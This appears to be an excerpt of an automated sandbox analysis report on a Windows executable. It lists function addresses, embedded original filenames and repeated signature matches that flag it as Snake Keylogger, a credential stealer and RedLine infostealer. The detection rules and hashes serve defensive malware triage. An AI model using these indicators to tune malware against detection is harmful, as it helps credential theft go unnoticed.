Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0858C6B0	0_2_0858C6B0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085824B2	0_2_085824B2
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0858DEA8	0_2_0858DEA8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_08583BAA	0_2_08583BAA
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_08589BAA	0_2_08589BAA
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085812A0	0_2_085812A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0858B3A0	0_2_0858B3A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085852A0	0_2_085852A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085870A1	0_2_085870A1
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B8940	0_2_085B8940
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B21C0	0_2_085B21C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BD440	0_2_085BD440
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B0040	0_2_085B0040
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BA240	0_2_085BA240
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BBE60	0_2_085BBE60
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B8C60	0_2_085B8C60
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BF060	0_2_085BF060
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B9C00	0_2_085B9C00
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BCE00	0_2_085BCE00
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B0006	0_2_085B0006
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B1830	0_2_085B1830
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B1821	0_2_085B1821
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BB820	0_2_085BB820
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BEA20	0_2_085BEA20
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BE0C0	0_2_085BE0C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BAEC0	0_2_085BAEC0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B1CF8	0_2_085B1CF8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B04F8	0_2_085B04F8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B1CEA	0_2_085B1CEA
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BCAE0	0_2_085BCAE0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B98E0	0_2_085B98E0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B0E91	0_2_085B0E91
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BDA80	0_2_085BDA80
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BA880	0_2_085BA880
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BF6A8	0_2_085BF6A8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BC4A0	0_2_085BC4A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B92A0	0_2_085B92A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B0EA0	0_2_085B0EA0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B1358	0_2_085B1358
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BED40	0_2_085BED40
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BBB40	0_2_085BBB40
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B1368	0_2_085B1368
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BA560	0_2_085BA560
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BD760	0_2_085BD760
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B0508	0_2_085B0508
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BB500	0_2_085BB500
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BE700	0_2_085BE700
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BED30	0_2_085BED30
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B9F20	0_2_085B9F20
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BD120	0_2_085BD120
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B09D0	0_2_085B09D0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BF9C8	0_2_085BF9C8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B09C0	0_2_085B09C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BC7C0	0_2_085BC7C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B95C0	0_2_085B95C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BB1E0	0_2_085BB1E0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BE3E0	0_2_085BE3E0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BF388	0_2_085BF388
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BC180	0_2_085BC180
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B8F80	0_2_085B8F80
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085B21B0	0_2_085B21B0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BABA0	0_2_085BABA0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085BDDA0	0_2_085BDDA0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F4978	0_2_085F4978
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F2DD8	0_2_085F2DD8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F2010	0_2_085F2010
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F4290	0_2_085F4290
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F26F8	0_2_085F26F8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F3BA8	0_2_085F3BA8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F34C0	0_2_085F34C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F4967	0_2_085F4967
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F2DC8	0_2_085F2DC8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F0040	0_2_085F0040
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F200A	0_2_085F200A
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F0006	0_2_085F0006
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F4280	0_2_085F4280
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F26E8	0_2_085F26E8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F3B98	0_2_085F3B98
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F1C90	0_2_085F1C90
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F1C8A	0_2_085F1C8A
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F12B8	0_2_085F12B8
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F12AA	0_2_085F12AA
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_085F34B0	0_2_085F34B0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_08E53DA4	0_2_08E53DA4
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_08E55F00	0_2_08E55F00
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_08E56BD1	0_2_08E56BD1
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_08E5BB78	0_2_08E5BB78
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_08E54C78	0_2_08E54C78
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_08E51E64	0_2_08E51E64

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Code function: String function: 0040E1D8 appears 44 times

Source: x8M2g1Xxhz.exe, 00000000.00000000.1350584585.0000000000426000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000002.3792566680.0000000000436000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000003.1364212507.0000000000994000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000002.3792306502.0000000000197000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe, 00000000.00000003.1364351995.00000000009A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs x8M2g1Xxhz.exe
Source: x8M2g1Xxhz.exe	Binary or memory string: OriginalFilenameAubriella.exe4 vs x8M2g1Xxhz.exe

Source: x8M2g1Xxhz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.x8M2g1Xxhz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
